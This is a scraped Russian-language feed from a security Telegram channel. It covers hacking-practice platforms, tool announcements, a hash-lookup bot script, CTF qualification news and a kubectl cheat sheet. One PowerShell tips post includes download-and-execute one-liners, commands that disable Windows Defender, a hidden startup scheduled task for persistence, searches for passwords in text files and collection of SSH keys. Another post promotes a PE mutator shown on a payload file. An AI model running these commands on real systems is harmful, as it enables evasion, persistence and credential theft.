Whitehat Lab
2.05K subscribers
344 photos
393 links
Авторский канал об информационной безопасности 🔐
Свежие CVE, Red Team инструменты, внутренняя инфраструктура и другое

Чат: @whitehat_chat

Все материалы предназначены исключительно в образовательных целях
Download Telegram
🎯 Pentest-Ground

Площадка с заведомо уязвимыми веб-приложениями и сетевыми сервисами. Можно использовать для проверки эффективности инструментов поиска уязвимостей или в образовательных целях

Поднятые лаборатории:

Damn Vulnerable Web Application - классическое веб приложение
Damn Vulnerable GraphQL Application - GraphQL
RestFlaw - REST API
ShadowLogic - WebLogic
CipherHeart - Redis
GuardianLeaks - веб приложение


Реверт лаб происходит каждые 30 минут

🔗 Pentest-Ground

#pentest #training #dvwa #pentestground #graphql

✈️ Whitehat Lab 💬Chat
Please open Telegram to view this post
VIEW IN TELEGRAM
111
🗝️ Weakpass

Недавно был пост об отличном сервисе Weakpass у которого в наличии абсолютно бесплатный API

Прикрутил к боту Password lookup (MD5, NTLM, SHA1 или SHA256)

import requests
from aiogram import Router, F
from aiogram.types import Message
import logging
import app.config.cfg as cfg
import json

router: Router = Router()


def check_hash_string(hash_string: str):
try:
headers = {'Content-Type': 'application/json'}
url = requests.get(f'https://weakpass.com/api/v1/search/{hash_string}.json', headers=headers)
output = json.loads(url.text)
hash_info = json.dumps(output, indent=2)
return hash_info
except Exception as e:
logging.warning(e)

@router.message(F.text.startswith(cfg.all_commands['check_hash']))
async def check_hash(message: Message):
try:
msg = message.text.split()
if len(msg) == 2:
await message.answer(f'<b>{check_hash_string(msg[1])}</b>', disable_web_page_preview=True)
else:
await message.answer(f'Пример:\n<code>!check_hash 5f4dcc3b5aa765d61d8327deb882cf99</code>')
except Exception as e:
logging.warning(e)


Работает в чате канала

!check_hash 5f4dcc3b5aa765d61d8327deb882cf99

➡️ Home
➡️ Wordlists
➡️ API
💻 Github

#weakpass #api #bot #python

✈️ Whitehat Lab
Please open Telegram to view this post
VIEW IN TELEGRAM
🔨 Доброго времени суток друзья!

Как вы уже знаете, мой предыдущий канал был заблокирован.

Получено уведомление:
Your community Pentest HaT was blocked for violations of the Telegram Terms of Service (illegal goods) based on user reports confirmed by our moderators.


К сожалению, никаких подробностей мне не предоставили — что именно считается "illegal goods", осталось загадкой. Судя по всему, кто-то решил накидать абуз, и канал забанили без разбирательства.

Вот что написано в ToS:
▪️Не использовать мессенджер для рассылки спама или обмана пользователей;
▪️Не призывать к насилию в публичных каналах, ботах и других общедоступных чатах в Telegram;
▪️Не размещать незаконный порнографический контент в каналах, ботах и других общедоступных чатах в Telegram.
▪️Не заниматься деятельностью, которая признана незаконной в большинстве стран. Это включает жестокое обращение с детьми, продажу или предложение незаконных товаров и услуг (наркотики, оружие, поддельные документы) и т.д.


Понятия не имею, что из этого я мог нарушить
Конечно приятного мало и я слегка расстроился, но руки не опустились и было принято решение создать новый канал 🎩 Whitehat Lab

Все важные материалы перенесены, а также сохранена работа ботов. Планирую продолжить публиковать обзоры полезных Red Team инструментов, свежих CVE, PoC-эксплоитов и других полезных материалов из мира кибербезопасности.

Буду признателен всем тем кто подпишется
Репост и распространение информации приветствуется 👍

✈️ Whitehat Lab
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥19😢2
💻 Warp

Современный многофункциональный терминал со встроенным AI ассистентом (free 50 запросов в неделю)
Написан на 👣 Rust
В данный момент работает под 🍏MacOS и 🐧Linux, поддержку 🏠 Windows подвезут чуть позже

UPD. Подвезли поддержку 💻 Долго я этого ждал.
Пока только начал тестировать, немного непривычно, но довольно удобный и богатый функционал радует.

Установка via winget:

winget install Warp.Warp


Установка:

brew install --cask warp
sudo apt install ./<file>.deb
sudo dnf install ./<file>.rpm
sudo pacman -U ./<file>.pkg.tar.zst


Или добавим репозиторий и устанавливаем 1ой командой:

sudo apt install wget gpg
wget -qO- https://releases.warp.dev/linux/keys/warp.asc | gpg --dearmor > warpdotdev.gpg
sudo install -D -o root -g root -m 644 warpdotdev.gpg /etc/apt/keyrings/warpdotdev.gpg
sudo sh -c 'echo "deb [arch=amd64 signed-by=/etc/apt/keyrings/warpdotdev.gpg] https://releases.warp.dev/linux/deb stable main" > /etc/apt/sources.list.d/warpdotdev.list'
rm warpdotdev.gpg
sudo apt update && sudo apt install warp-terminal


😉 Home
😉 Download
😉 Docs

#warp #terminal #rust #soft

✈️ Whitehat Lab
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥51
💻 Windows Millennium Edition

Надоели мне все эти 🐧*nix системы. 10 и 11 💻 Windows тоже, с сегодняшнего дня перехожу на Me, одна из лучших систем всех времен и народов

Шутка 😂

В моем личном рейтинге занимает твердое первое место, как худшая ОС в истории, которой мне довелось пользоваться 😁😱


#windows

✈️ Whitehat Lab
Please open Telegram to view this post
VIEW IN TELEGRAM
😁6🌚1
🔄 🚩 💻Список площадок для оттачивания навыков этичного хакинга, подойдет для тренировок CTF.

😉 Hack The Box
Windows, *nix машины для самостоятельного пентеста. Во free тарифе всегда доступно 20 машин. Обучение, академия, лабы и т.д. Есть огромное количество CTF заданий в различных категориях.
Возможность сдать экзамены и получить сертификаты CBBH (Certified Bug Bounty Hunter), CPTS (Certified Penetration Testing Specialist), CWEE (Certified Web Exploitation Expert) и CDSA (Certified Defensive Security Analyst) 🙃


😉 TryHackMe
Аналог HackTheBox без CTF заданий. Академия в наличии, также присутствует free тариф 😁


😉 PortSwigger
Академия веб пентеста от создателей BurpSuite. Для сдачи экзамена необходима активная подписка на Burp Suite Professional, цена экзамена 99$ 😈


😉 CTFtime
Информацию почти обо всех прошедших и предстоящих CTF соревнованиях можно найти здесь


😉 HackerLab
Русскоязычная площадка 😎. Большое (300+) количество CTF задач в самых различных категориях (web, crypto, rev, pwn, osint и т.д.), в наличии Windows и Linux машины. Есть бесплатный тариф


😉 CryptoHack
Один из лучших ресурсов с задачами по криптографии. Нравится криптография ? Вам сюда, от азов до сложнейших задач


😉 Standoff365
Киберполигон от компании 😎 Positive Technologies. Это виртуальная инфраструктура с реалистичными копиями IT-систем из разных отраслей. Достаточно высокий порог вхождения. Ежегодно проводятся турниры, куда вы можете отобраться со своей командой


😉 TaipanByte CTF
Русскоязычная площадка от ребят из команды TaipanByte, большое кол-во тасков (80+) во всех основных категориях


😉 pwn.college
Образовательная платформа, позволяющая изучать и практиковать основные концепции кибербезопасности. Рассчитана на новичков


😉 Kontra
Appsec тренировки, LLM, owasp top10, owasp api top10, aws top10 и т.д.


😉 Linux Journey
Путешествие в мир Linux, основные команды, лабы, руководства


😉 OverTheWire Bandit
Игра из 34 уровней для изучения Linux


😉 Crackmes
Большое количество (~4000) крякми для изучения. Подойдет реверсерам


😉 Pwnable
Для любителей бинарной эксплуатации (PWN)


😉 Cyber-Ed
Русскоязычная площадка. One task of the month - выкладывают по 1ой CTF задаче в месяц, в этом году планируют 10 заданий в категориях: web, pwn, crypto, reverse, misc и т.д.


😉 Root Me
Огромное (500+) кол-во заданий в самых разных категориях


😉 picoCTF
Площадка с CTF заданиями начального уровня, почти на все задания можно найти райтапы


😉 Exploit Education
ВМ Phoenix для изучения уязвимостей, разработки эксплойтов, отладки программного обеспечения и общих проблем кибербезопасности
Темы - Network programming, Stack overflows, Format string vulnerabilities, Heap overflows


😉 0xf.at
Парольные загадки (ребусы), например, пароль это сумма чисел от 1 до 446, соответственно надо написать простенькую автоматизацию и ввести в поле ввода


😉 Hacker Test
Простенький хакер квест состоящий из 20 уровней


⚠️ P.S. Если вы знаете подобные площадки, лично проверяли и они заслуживают внимания, пишите пожалуйста в бота обратной связи - @wh_feedback_bot

#htb #crackmes #bandit #hacking #ctf #ethical

✈️ Whitehat Lab
Please open Telegram to view this post
VIEW IN TELEGRAM
9🔥5222
👋 Добрый день товарищи!

Напоминаю, что по адресу @whitehat_chat находится чатик, в котором можно пообщаться и задать интересующие вас вопросы, так же там "живет" бот, обладающий полезным функционалом:

▪️Определяем тип хеша
!hash a6105c0a611b41b08f1209506350279e


▪️Поиск эксплоитов по названию
!ss Microsoft Exchange 2019


▪️Поиск эксплоитов (PoC) по CVE
!poc CVE-2023-46604


▪️Узнаем пароль по базе (MD5, NTLM, SHA1 или SHA256)
!check_hash a6105c0a611b41b08f1209506350279e


▪️Проверка доступности порта
!port ya.ru 80


▪️Список мостов для Tor
!bridges


▪️Бот обратной связи
!feedback


▪️Генерация qr кода
!qr https://t.iss.one/wh_lab


▪️Бот для определения ID файлов, эмодзи, сообщений и т.д. (полезен для разработчиков ботов)

🤖 Get Any IDs

#bot #chat

✈️ Whitehat Lab
Please open Telegram to view this post
VIEW IN TELEGRAM
632🔥1
😎 Квалификация на Standoff 15

Я, понятное дело за HackerLab 😎 🚩
Проходят 5 команд

Реализовано 13 из 24 критических событий
Всем успехов и немного удачи!

📌 Scoreboard

#standoff #quals

✈️ Whitehat Lab
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥9221
🔄 🖥 URLFinder v0.0.3

Высокоскоростной инструмент для пассивного сбора и эффективного обнаружения URL-адресов. От создателей nuclei, написан на 💻

UPD. Добавили scope контроль:

SCOPE:
-us, -url-scope string[] in scope url regex to be followed by urlfinder
-uos, -url-out-scope string[] out of scope url regex to be excluded by urlfinder
-fs, -field-scope string pre-defined scope field (dn,rdn,fqdn) or custom regex (e.g., '(company-staging.io|company.com)') (default "rdn")
-ns, -no-scope disables host based default scope
-do, -display-out-scope display external endpoint from scoped crawling


Установка:

go install -v github.com/projectdiscovery/urlfinder/cmd/urlfinder@latest


Запуск:

urlfinder -d tesla.com

# Match и filter
urlfinder -d tesla.com -m support -f faq

urlfinder -d tesla.com -m include-patterns.txt -f exclude-patterns.txt

# JSON export
urlfinder -d tesla.com -j


🖥 Home

#urlfinder #soft #golang #web #pentest

✈️ Whitehat Lab
Please open Telegram to view this post
VIEW IN TELEGRAM
5👍32
😎 Квалификация на Standoff 15

2ой день отборов
Проходят 5 команд

Реализовано 17 из 24 критических событий

📌 Scoreboard

#standoff #quals

✈️ Whitehat Lab
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥71
🔄🔎 HAITI (hash identifier) v3.0.0

Один из лучших инструментов для определения типа хеша. Написан на 💻 Ruby

UPD.
Вышло большое обновление до мажорной 3.0.0 версии - changelog

Поддержка 641 хеша
7 новых типов хешей
Множественные улучшения (описания и исправления для JtR и HC)
Поддержка Ruby 3.4


⚙️ Возможности:

Поддержка современных алгоритмов (SHA3, Keccak, Blake2, etc.)
Показывает формат для Hashcat и JohntheRipper
Работает как приложение и библиотека


Установка
:

gem install haiti-hash

Примеры:

haiti 786a02f742015903c6c6fd852552d272912f4740e15847618a86e217f71f5419d25e1031afee585313896444934eb04b903a685b1448b755d56f701afe9be2ce


SHA-512 [HC: 1700] [JtR: raw-sha512]
SHA3-512 [HC: 17600] [JtR: raw-sha3]
SHA3-512 [HC: 17600] [JtR: dynamic_400]
Keccak-512 [HC: 18000] [JtR: raw-keccak]
BLAKE2-512 [JtR: raw-blake2]
Whirlpool [HC: 6100] [JtR: whirlpool]
Salsa10
Salsa20
Skein-512 [JtR: skein-512]
Skein-1024(512)


Библиотека:

require 'haiti'

# Instantiate a HashIdentifier object that will automatically identify
# the hash type
hi = HashIdentifier.new('786a02f742015903c6c6fd852552d272912f4740e15847618a86e217f71f5419d25e1031afee585313896444934eb04b903a685b1448b755d56f701afe9be2ce')

# Loop over the hash type candidates and retrieve data
hi.type.each do |type|
name = type.name
hashcat_id = type.hashcat
john_ref = type.john
extended = type.extended
samples = type.samples
end


💻 Docs
💻 Home
➡️ Site

#haiti #hash #soft #ruby

✈️ Whitehat Lab
Please open Telegram to view this post
VIEW IN TELEGRAM
👍82
✖️ Astral-PE 1.5.5

Протектор для 💻 Windows PE файлов
Изменяет важные структуры - timestamps, headers, section flags, debug info, import/export

⚙️ Использование:

./Astral-PE.exe payload.exe -o payload_clean.exe


😹 Home
😹 Download

#astralpe #mutator

✈️ Whitehat Lab
Please open Telegram to view this post
VIEW IN TELEGRAM
62
🖥 OWASP SamuraiWTF 5.3

Виртуальная лаборатория, основанная на 🐧 для тренировки веб пентеста с открытым исходным кодом

Предустановленные лабы и инструменты:

▪️ OWASP Juice Shop
▪️ WebGoat
▪️ Mutillidae
▪️ bWAPP
▪️ DVWA
▪️ Burp Suite
▪️ Nikto
▪️ SQLMap


➡️ Home
➡️ Download
🖥 Source
🖥 Docs

#web #pentest #samurai

✈️ Whitehat Lab
Please open Telegram to view this post
VIEW IN TELEGRAM
9211
💻 progress v0.17 - Coreutils Progress Viewer

Показывает прогресс многих Coreutils инструментов, cp, mv, dd, tar, gz и т.д.

Установка в 🐧 Debian like:

sudo apt install progress


Использование:

watch progress -q
progress -w
watch progress -wc firefox
progress -c httpd
cp bigfile newfile & progress -mp $!


💻 Home

#progress #coreutils

✈️ Whitehat Lab
Please open Telegram to view this post
VIEW IN TELEGRAM
👍5211
😎 Квалификация на Standoff 15

Заключительный день отборов
В финал пройдут 5 команд
🚩 HackerLab вперёд!

Отчеты принимаются до 22.00

Реализовано 22 из 24 критических событий

📌 Scoreboard

#standoff #quals

✈️ Whitehat Lab
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥1021
😎 Квалификация на Standoff 15

⌨️ Поздравляю первую пятерку команд с проходом в финальную стадию

🚩 HackerLab красавчики, всем респект!

Реализовано 22 из 24 критических событий

2 нерешенных таска объявляю лютейшей уцуцугой 🧙

📌 Scoreboard

#standoff #quals

✈️ Whitehat Lab
Please open Telegram to view this post
VIEW IN TELEGRAM
6🔥3
🏃 Powershell Tips & Tricks

Для выполнения некоторых командлетов необходим импортированный AD модуль

🖥 ADModule

Подключаем:

Import-Module C:\Microsoft.ActiveDirectory.Management.dll -Verbose
iex (new-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/samratashok/ADModule/master/Import-ActiveDirectory.ps1');Import-ActiveDirectory

или
Import-Module C:\Microsoft.ActiveDirectory.Management.dll -Verbose
Import-Module C:\ActiveDirectory\ActiveDirectory.psd1
Get-Command -Module ActiveDirectory


Информация о системе
:

Get-WmiObject -Class Win32_OperatingSystem | Select-Object -Property *


Список процессов:

Get-Process | Select-Object -Property ProcessName, Id, CPU | Sort-Object -Property CPU -Descending


FailureAudit в логах:

Get-EventLog -LogName Security | Where-Object {$_.EntryType -eq 'FailureAudit'}


Сканер портов:

1..1024 | ForEach-Object { $sock = New-Object System.Net.Sockets.TcpClient; $async = $sock.BeginConnect('localhost', $_, $null, $null); $wait = $async.AsyncWaitHandle.WaitOne(100, $false); if($sock.Connected) { $_ } ; $sock.Close() }


Выполнить команду на удаленном ПК:

Invoke-Command -ComputerName TargetPC -ScriptBlock { Get-Process } -Credential (Get-Credential)


Скачать и выполнить скрипт:

$url = 'https://example.com/script.ps1'; Invoke-Expression (New-Object Net.WebClient).DownloadString($url)


Execution policy bypass:

Set-ExecutionPolicy Bypass -Scope Process -Force; .\script.ps1


Список доменных юзеров:

# Нужен AD модуль
Get-ADUser -Filter * -Properties * | Select-Object -Property Name, Enabled, LastLogonDate


Список залогиненых юзеров:

Get-WMIObject -Class Win32_ComputerSystem -Computer "HOST01" | Select-Object Username


Давно не логинились, но УЗ включена:

# Нужен AD модуль
Get-ADuser -filter {enabled -eq "True"} -properties LastlogonDate | ? {$_.lastlogondate -le (get-date).adddays(-90)} | ft Name


Прибить процесс:

Get-Process -Name "Notepad" | Stop-Process -Force


Список установленного ПО:

Get-ItemProperty HKLM:\Software\Microsoft\Windows\CurrentVersion\Uninstall\* | Select-Object DisplayName, Publisher, InstallDate


Мониторинг изменений ФС
:

$watcher = New-Object System.IO.FileSystemWatcher; $watcher.Path = 'C:\'; $watcher.IncludeSubdirectories = $true; $watcher.EnableRaisingEvents = $true; Register-ObjectEvent $watcher 'Created' -Action { Write-Host 'File Created: ' $Event.SourceEventArgs.FullPath }


Отключаем Defender:

Set-MpPreference -SubmitSamplesConsent NeverSend
Set-MpPreference -MAPSReporting Disabled
Set-MpPreference -DisableRealtimeMonitoring $true


Задание в планировщик для закрепа:

$action = New-ScheduledTaskAction -Execute 'Powershell.exe' -Argument '-NoProfile -WindowStyle Hidden -Command "YourCommand"'; $trigger = New-ScheduledTaskTrigger -AtStartup; Register-ScheduledTask -Action $action -Trigger $trigger -TaskName 'MyTask' -Description 'MyDescription'


Поиск паролей в текстовых файлах:

Select-String -Path C:\Users\*\Documents\*.txt -Pattern 'password' -CaseSensitive


Собираем SSH ключи:

Get-ChildItem -Path C:\Users\*\.ssh\id_rsa -Recurse


Продолжение следует

#powershell #windows

✈️ Whitehat Lab
Please open Telegram to view this post
VIEW IN TELEGRAM
👍832
🤨 Искал медь, а нашёл золото

Наткнулся на настоящее сокровище для веб-пентестера — огромную подборку расширений для Burp Suite (Community и Pro) с их описанием на GitHub. Здесь есть всё, чтобы прокачать ваш инструмент до боевого монстра!

Внутри репозитория:
➡️Scanners — сканеры уязвимостей;
➡️Custom Features — уникальные доработки для Burp Suite;
➡️Beautifiers and Decoders — форматирование и декодирование данных;
➡️Cloud Security — тестирование облачных сервисов;
➡️Scripting — расширения для работы со скриптами и автоматизации тестирования;
➡️OAuth and SSO — инструменты для тестирования аутентификации;
➡️Information Gathering — сбор информации о целевой системе;
➡️Vulnerability Specific Extensions — инструменты под конкретные уязвимости;
➡️Web Application Firewall Evasion — обход систем веб-защиты;
➡️Logging and Notes — ведение логов и заметок во время тестов;
➡️Payload Generators and Fuzzers — генераторы полезных нагрузок и фаззеры;
➡️Cryptography — инструменты для работы с шифрами/хэшами;
➡️Tool Integration — расширения, связанные с интеграцией Burp Suite с другим программным обеспечением/инструментами;
➡️Misc — разные полезные расширения;
➡️Burp Extension Training Resources — обучающие материалы по работе с расширениями.

А какие добавленные расширения вам больше всего понравились?

🔗 Ссылка на подборку расширений Burp Suite
Please open Telegram to view this post
VIEW IN TELEGRAM
12🔥2
⚙️ bat v0.25.0

Клон cat'a с поддержкой подсветки синтаксиса
Кроссплатформенный, написан на 💻 Rust

По умолчанию работает как утилита less с построчным выводом. Для отключения можно сделать alias:

alias cat='bat --paging=never'


Основную функцию - конкатенацию, выполняет

bat 1.txt 2.txt 3.txt > merged.txt


🐧 Установка в Debian like:

wget https://github.com/sharkdp/bat/releases/download/v0.25.0/bat-musl_0.25.0_musl-linux-amd64.deb

sudo dpkg -i bat-musl_0.25.0_musl-linux-amd64.deb


Если будете ставить через sudo apt install bat в зависимости от дистрибутива утилита может называться batcat

💻 Установка в Windows:

winget install sharkdp.bat


⚙️ Использование:

# Несколько файлов
bat src/*.rs

# Из stdin
curl -s https://sh.rustup.rs | bat

# Показать непечатные символы
bat -A /etc/hosts

tail -f /var/log/pacman.log | bat --paging=never -l log


💻 Home

#bat #soft #rust

✈️ Whitehat Lab
Please open Telegram to view this post
VIEW IN TELEGRAM
3
Forwarded from Ralf Hacker Channel (Ralf Hacker)
И еще один хороший материал подъехал пол часа назад)

В блоге рассматривается шифрование MSSQL Server и методы подбора ключей.

https://specterops.io/blog/2025/04/08/the-sql-server-crypto-detour/

Что еще прикольное узнали из блога: ManageEngine ADSelfService по умолчанию использует ключ, который Microsoft показывает в качестве примера в своей справке😁 прикол конечно...

#pentest #redteam #sql #ad
8
🖼️ Commands cheat sheet

# Get commands with basic output
kubectl get services
kubectl get pods --all-namespaces
kubectl get pods -o wide
kubectl get deployment my-dep
kubectl get pods
kubectl get pod my-pod -o yaml

# Describe commands with verbose output
kubectl describe nodes my-node
kubectl describe pods my-pod

# List Services Sorted by Name
kubectl get services --sort-by=.metadata.name

# List pods Sorted by Restart Count
kubectl get pods --sort-by='.status.containerStatuses[0].restartCount'

# List PersistentVolumes sorted by capacity
kubectl get pv --sort-by=.spec.capacity.storage

# Get the version label of all pods with label app=cassandra
kubectl get pods --selector=app=cassandra -o \
jsonpath='{.items[*].metadata.labels.version}'

# Retrieve the value of a key with dots, e.g. 'ca.crt'
kubectl get configmap myconfig \
-o jsonpath='{.data.ca\.crt}'

# Retrieve a base64 encoded value with dashes instead of underscores.
kubectl get secret my-secret --template='{{index .data "key-name-with-dashes"}}'

# Get all worker nodes (use a selector to exclude results that have a label
# named 'node-role.kubernetes.io/control-plane')
kubectl get node --selector='!node-role.kubernetes.io/control-plane'

# Get all running pods in the namespace
kubectl get pods --field-selector=status.phase=Running

# Get ExternalIPs of all nodes
kubectl get nodes -o jsonpath='{.items[*].status.addresses[?(@.type=="ExternalIP")].address}'

# List Names of Pods that belong to Particular RC
# "jq" command useful for transformations that are too complex for jsonpath, it can be found at https://jqlang.github.io/jq/
sel=${$(kubectl get rc my-rc --output=json | jq -j '.spec.selector | to_entries | .[] | "\(.key)=\(.value),"')%?}
echo $(kubectl get pods --selector=$sel --output=jsonpath={.items..metadata.name})

# Show labels for all pods (or any other Kubernetes object that supports labelling)
kubectl get pods --show-labels

# Check which nodes are ready
JSONPATH='{range .items[*]}{@.metadata.name}:{range @.status.conditions[*]}{@.type}={@.status};{end}{end}' \
&& kubectl get nodes -o jsonpath="$JSONPATH" | grep "Ready=True"

# Check which nodes are ready with custom-columns
kubectl get node -o custom-columns='NODE_NAME:.metadata.name,STATUS:.status.conditions[?(@.type=="Ready")].status'

# Output decoded secrets without external tools
kubectl get secret my-secret -o go-template='{{range $k,$v := .data}}{{"### "}}{{$k}}{{"\n"}}{{$v|base64decode}}{{"\n\n"}}{{end}}'

# List all Secrets currently in use by a pod
kubectl get pods -o json | jq '.items[].spec.containers[].env[]?.valueFrom.secretKeyRef.name' | grep -v null | sort | uniq

# List all containerIDs of initContainer of all pods
# Helpful when cleaning up stopped containers, while avoiding removal of initContainers.
kubectl get pods --all-namespaces -o jsonpath='{range .items[*].status.initContainerStatuses[*]}{.containerID}{"\n"}{end}' | cut -d/ -f3

# List Events sorted by timestamp
kubectl get events --sort-by=.metadata.creationTimestamp

# List all warning events
kubectl events --types=Warning

# Compares the current state of the cluster against the state that the cluster would be in if the manifest was applied.
kubectl diff -f ./my-manifest.yaml

# Produce a period-delimited tree of all keys returned for nodes
# Helpful when locating a key within a complex nested JSON structure
kubectl get nodes -o json | jq -c 'paths|join(".")'

# Produce a period-delimited tree of all keys returned for pods, etc
kubectl get pods -o json | jq -c 'paths|join(".")'

# Get a deployment's status subresource
kubectl get deployment nginx-deployment --subresource=status

# dump pod logs
kubectl logs my-pod

# dump pod logs, with label name=myLabel
kubectl logs -l name=myLabel

# dump pod logs for a previous instantiation
kubectl logs my-pod --previous

# dump pod container logs (stdout, multi-container case)
kubectl logs my-pod -c my-container

kubectl logs -l name=myLabel -c my-container
kubectl logs my-pod -c my-container --previous
kubectl logs -f my-pod


#kuber #k8s #kubectl #cheatsheet

✈️ Whitehat Lab
Please open Telegram to view this post
VIEW IN TELEGRAM
51